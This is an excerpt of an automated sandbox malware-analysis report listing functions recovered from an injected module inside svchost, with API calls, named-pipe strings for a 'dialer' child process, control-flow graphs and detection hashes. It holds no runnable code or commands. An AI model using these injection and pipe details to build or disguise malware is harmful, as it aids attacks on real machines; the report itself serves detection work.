                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF65
                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF76
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: 5deeaa700c7bca527ac3e0ef52b0542e40d86773dc9f6c8a69b3fdc468513023
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: B5412034303E4C82FB6BA7EE59753F913C35B857B4F140724A936E6ED6DE2894818700
                                                                                Function 00000195DD5C2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: ef64e02e287f94d0d9415c348699ab4dc805c8a96bd9a803ab77d90ce42376f4
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: 09217932614B4483FB118BA5F4647AA73E2F789BA5F544215EA5953FA8CF3CC14ACB00
                                                                                Function 00000195DD5CA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 590 195dd5ca544-195dd5ca5ac call 195dd5cb414 593 195dd5ca5b2-195dd5ca5b5 590->593 594 195dd5caa13-195dd5caa1b call 195dd5cc748 590->594 593->594 595 195dd5ca5bb-195dd5ca5c1 593->595 597 195dd5ca690-195dd5ca6a2 595->597 598 195dd5ca5c7-195dd5ca5cb 595->598 600 195dd5ca963-195dd5ca967 597->600 601 195dd5ca6a8-195dd5ca6ac 597->601 598->597 602 195dd5ca5d1-195dd5ca5dc 598->602 605 195dd5ca9a0-195dd5ca9aa call 195dd5c9634 600->605 606 195dd5ca969-195dd5ca970 600->606 601->600 603 195dd5ca6b2-195dd5ca6bd 601->603 602->597 604 195dd5ca5e2-195dd5ca5e7 602->604 603->600 607 195dd5ca6c3-195dd5ca6ca 603->607 604->597 608 195dd5ca5ed-195dd5ca5f7 call 195dd5c9634 604->608 605->594 619 195dd5ca9ac-195dd5ca9cb call 195dd5c7940 605->619 606->594 609 195dd5ca976-195dd5ca99b call 195dd5caa1c 606->609 611 195dd5ca894-195dd5ca8a0 607->611 612 195dd5ca6d0-195dd5ca707 call 195dd5c9a10 607->612 608->619 623 195dd5ca5fd-195dd5ca628 call 195dd5c9634 * 2 call 195dd5c9d24 608->623 609->605 611->605 616 195dd5ca8a6-195dd5ca8aa 611->616 612->611 628 195dd5ca70d-195dd5ca715 612->628 620 195dd5ca8ba-195dd5ca8c2 616->620 621 195dd5ca8ac-195dd5ca8b8 call 195dd5c9ce4 616->621 620->605 627 195dd5ca8c8-195dd5ca8d5 call 195dd5c98b4 620->627 621->620 634 195dd5ca8db-195dd5ca8e3 621->634 659 195dd5ca62a-195dd5ca62e 623->659 660 195dd5ca648-195dd5ca652 call 195dd5c9634 623->660 627->605 627->634 632 195dd5ca719-195dd5ca74b 628->632 636 195dd5ca751-195dd5ca75c 632->636 637 195dd5ca887-195dd5ca88e 632->637 639 195dd5ca8e9-195dd5ca8ed 634->639 640 195dd5ca9f6-195dd5caa12 call 195dd5c9634 * 2 call 195dd5cc6a8 634->640 636->637 641 195dd5ca762-195dd5ca77b 636->641 637->611 637->632 643 195dd5ca8ef-195dd5ca8fe call 195dd5c9ce4 639->643 644 195dd5ca900 639->644 640->594 645 195dd5ca781-195dd5ca7c6 call 195dd5c9cf8 * 2 641->645 646 195dd5ca874-195dd5ca879 641->646 654 195dd5ca903-195dd5ca90d call 195dd5cb4ac 643->654 644->654 671 195dd5ca804-195dd5ca80a 645->671 672 195dd5ca7c8-195dd5ca7ee call 195dd5c9cf8 call 195dd5cac38 645->672 651 195dd5ca884 646->651 651->637 654->605 668 195dd5ca913-195dd5ca961 call 195dd5c9944 call 195dd5c9b50 654->668 659->660 665 195dd5ca630-195dd5ca63b 659->665 660->597 675 195dd5ca654-195dd5ca674 call 195dd5c9634 * 2 call 195dd5cb4ac 660->675 665->660 667 195dd5ca63d-195dd5ca642 665->667 667->594 667->660 668->605 679 195dd5ca87b 671->679 680 195dd5ca80c-195dd5ca810 671->680 690 195dd5ca7f0-195dd5ca802 672->690 691 195dd5ca815-195dd5ca872 call 195dd5ca470 672->691 696 195dd5ca68b 675->696 697 195dd5ca676-195dd5ca680 call 195dd5cb59c 675->697 684 195dd5ca880 679->684 680->645 684->651 690->671 690->672 691->684 696->597 700 195dd5ca9f0-195dd5ca9f5 call 195dd5cc6a8 697->700 701 195dd5ca686-195dd5ca9ef call 195dd5c92ac call 195dd5caff4 call 195dd5c94a0 697->701 700->640 701->700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                                • Instruction ID: 9c2520efcc87ac771d522e1eb6396a81ecb0ce0daac719ccbdf896b70f129e44
                                                                                • Opcode Fuzzy Hash: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                                • Instruction Fuzzy Hash: 07E18D72606B488AEB32DFA9D4913DD7BE2F745B98F100115EE89A7F99CB35C481CB00
                                                                                Function 00000195DD599944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 469 195dd599944-195dd5999ac call 195dd59a814 472 195dd5999b2-195dd5999b5 469->472 473 195dd599e13-195dd599e1b call 195dd59bb48 469->473 472->473 474 195dd5999bb-195dd5999c1 472->474 476 195dd599a90-195dd599aa2 474->476 477 195dd5999c7-195dd5999cb 474->477 479 195dd599d63-195dd599d67 476->479 480 195dd599aa8-195dd599aac 476->480 477->476 481 195dd5999d1-195dd5999dc 477->481 482 195dd599da0-195dd599daa call 195dd598a34 479->482 483 195dd599d69-195dd599d70 479->483 480->479 484 195dd599ab2-195dd599abd 480->484 481->476 485 195dd5999e2-195dd5999e7 481->485 482->473 495 195dd599dac-195dd599dcb call 195dd596d40 482->495 483->473 486 195dd599d76-195dd599d9b call 195dd599e1c 483->486 484->479 488 195dd599ac3-195dd599aca 484->488 485->476 489 195dd5999ed-195dd5999f7 call 195dd598a34 485->489 486->482 492 195dd599ad0-195dd599b07 call 195dd598e10 488->492 493 195dd599c94-195dd599ca0 488->493 489->495 499 195dd5999fd-195dd599a28 call 195dd598a34 * 2 call 195dd599124 489->499 492->493 504 195dd599b0d-195dd599b15 492->504 493->482 496 195dd599ca6-195dd599caa 493->496 501 195dd599cba-195dd599cc2 496->501 502 195dd599cac-195dd599cb8 call 195dd5990e4 496->502 537 195dd599a48-195dd599a52 call 195dd598a34 499->537 538 195dd599a2a-195dd599a2e 499->538 501->482 508 195dd599cc8-195dd599cd5 call 195dd598cb4 501->508 502->501 517 195dd599cdb-195dd599ce3 502->517 510 195dd599b19-195dd599b4b 504->510 508->482 508->517 514 195dd599b51-195dd599b5c 510->514 515 195dd599c87-195dd599c8e 510->515 514->515 518 195dd599b62-195dd599b7b 514->518 515->493 515->510 519 195dd599df6-195dd599e12 call 195dd598a34 * 2 call 195dd59baa8 517->519 520 195dd599ce9-195dd599ced 517->520 522 195dd599b81-195dd599bc6 call 195dd5990f8 * 2 518->522 523 195dd599c74-195dd599c79 518->523 519->473 524 195dd599d00 520->524 525 195dd599cef-195dd599cfe call 195dd5990e4 520->525 550 195dd599c04-195dd599c0a 522->550 551 195dd599bc8-195dd599bee call 195dd5990f8 call 195dd59a038 522->551 529 195dd599c84 523->529 533 195dd599d03-195dd599d0d call 195dd59a8ac 524->533 525->533 529->515 533->482 548 195dd599d13-195dd599d61 call 195dd598d44 call 195dd598f50 533->548 537->476 554 195dd599a54-195dd599a74 call 195dd598a34 * 2 call 195dd59a8ac 537->554 538->537 542 195dd599a30-195dd599a3b 538->542 542->537 547 195dd599a3d-195dd599a42 542->547 547->473 547->537 548->482 555 195dd599c0c-195dd599c10 550->555 556 195dd599c7b 550->556 570 195dd599bf0-195dd599c02 551->570 571 195dd599c15-195dd599c72 call 195dd599870 551->571 575 195dd599a76-195dd599a80 call 195dd59a99c 554->575 576 195dd599a8b 554->576 555->522 560 195dd599c80 556->560 560->529 570->550 570->551 571->560 579 195dd599df0-195dd599df5 call 195dd59baa8 575->579 580 195dd599a86-195dd599def call 195dd5986ac call 195dd59a3f4 call 195dd5988a0 575->580 576->476 579->519 580->579
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367280331.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: 8578d22811c705561b9a0c63265d0fa22d72dfafe6aec0b6b4f758a2598a20e0
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 3EE18C72604B40CAEB62DBA5D4A03DD7BE2F756B98F142116EE8967F99CB34C191CF00
                                                                                Function 00000195DD5CF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                                • Instruction ID: f94411bdc3c5adc3673d068f26baf74004ea3de06b1d5fa0a00e338998d396b5
                                                                                • Opcode Fuzzy Hash: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                                • Instruction Fuzzy Hash: 4741B236313E0492EB17DB9AA8647D623E7BB45BA0F494125DD0AE7F84EE3CC44A8350
                                                                                Function 00000195DD5C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 85125c25dfd785958ae00b37ce84ac9a8513cd9fd1755175fa0b0cf5bc826ac5
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: CC418C33214F88C6E761CFA5E45479A77E2F389B89F048129DA8957B58DF3CC489CB00
                                                                                Function 00000195DD5CD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD087
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: b29a2c01b9a529d3d397189201e4ebb9e472c9377beb16884566e216c47c93f0
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: 47112134707A8881FB6A67AF59717E963C35B847F0F1443269839F6EDAEE28C5428700
                                                                                Function 00000195DD5C7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: db17aeae78a532267f4925ec03955f9628ff8aa19b2b3ce37216714fce8ee9dc
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 7281A031602E0F86FB63ABEE98713D967D3AB45780F145415DA05F7F96EB78C8868700
                                                                                Function 00000195DD5C9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                                • Instruction ID: 8d15efdb5329dbd6f8d908350e729aaeb4b7b6a33fa5c2f06519c4c6539ee195
                                                                                • Opcode Fuzzy Hash: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                                • Instruction Fuzzy Hash: 0E31E531213E04D1EF13DBCAA4207D523D6B759BA1F590625DD1EABB98EF38C245C710
                                                                                Function 00000195DD5D3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 900ef7d4bcd6fd2864e51168dc1007f1dfbbe5e213ae5e9ff28ad5abe65b03b1
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 2C11BF32310F4086E7629B96E8643A9B3E1F788FE5F044224EA1A97B94CF78C8058750
                                                                                Function 00000195DD5C3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: 42188e63fbb78b0732cb93c59acbf515d5b68af2c84de3977fd9872ca41c66e2
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 38118E36302F4982FF559B95F4242A963F2F749B85F040028DE8953B94EF3DC545C714
                                                                                Function 00000195DD5C5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 195e277db55ff97f3f99f451c10649e3fcd3ec1e2be31b8428dbef89db2187c3
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: 12D17876205F8882DB71DB9AE4A439A77E1F388B84F500116EA8E97FA5DF3CC551CB40
                                                                                Function 00000195DD5C2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: fc4c9099da629ec678108cb9cb41e40dfa530a30d66993f12becd6c4ba3f9dba
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: 0C317036702F5DC2E716DF9AE561BA977E2FB44B84F084020DE48A7F55EB34C4A18740
                                                                                Function 00000195DD5CCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: 8fdc15ff09e63732eb275527d3260f2eb5a265f6af426b64fb26ff3aadc1099c
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: C9115E34203E4882FB66A7AE59757B963C39B847B4F144725A836F6FD6EE6884428700
                                                                                Function 00000195DD5C199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 094941dede99f9d048632fe007c60956db5d273133d38dce1c9db68577c35704
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: F4018C31300E4882EB11DB92A86879963E2F788FC1F884035DE4DA3B54DF3CC98AC750
                                                                                Function 00000195DD5C36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: a4c37ed03e2153ec921c4fe35d3b930d694565bbf9533148a8bdd7b871a42841
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 00014075312F4882FF269BA6E82879573E2BB45B86F040424CE4967B54EF3DC149C710
                                                                                Function 00000195DD5C9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
                                                                                • Instruction ID: b6a9a57366d7e32ba7d8204e1a09c4ae5b67336b6113bd5d1bf03962d45849d0
                                                                                • Opcode Fuzzy Hash: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
                                                                                • Instruction Fuzzy Hash: FD51E732703A088AEB16CF59E469BD837D7F34AB89F518124DA06A3B8CDB75C841CB44
                                                                                Function 00000195DD5C8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 3343c703fad3ff3a8a0055ce76d4c8b5bb2113134d4bfc35ff936db91a6087cf
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 3931D132202A44C6E716DF5AE86879937E6F745BCAF058014EE46A7B8DDB39C941CB04
                                                                                Function 00000195DD5C1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: df346fd54c246db8dc1c541bbdd1f0d6174768352badab0d676f886130502b32
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 2BF04432304A4592E7618BA5F8A479967E2F748BD8F844021DA4957E54DF3CC64ECB10
                                                                                Function 00000195DD5C3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001E.00000002.3367755434.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_30_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
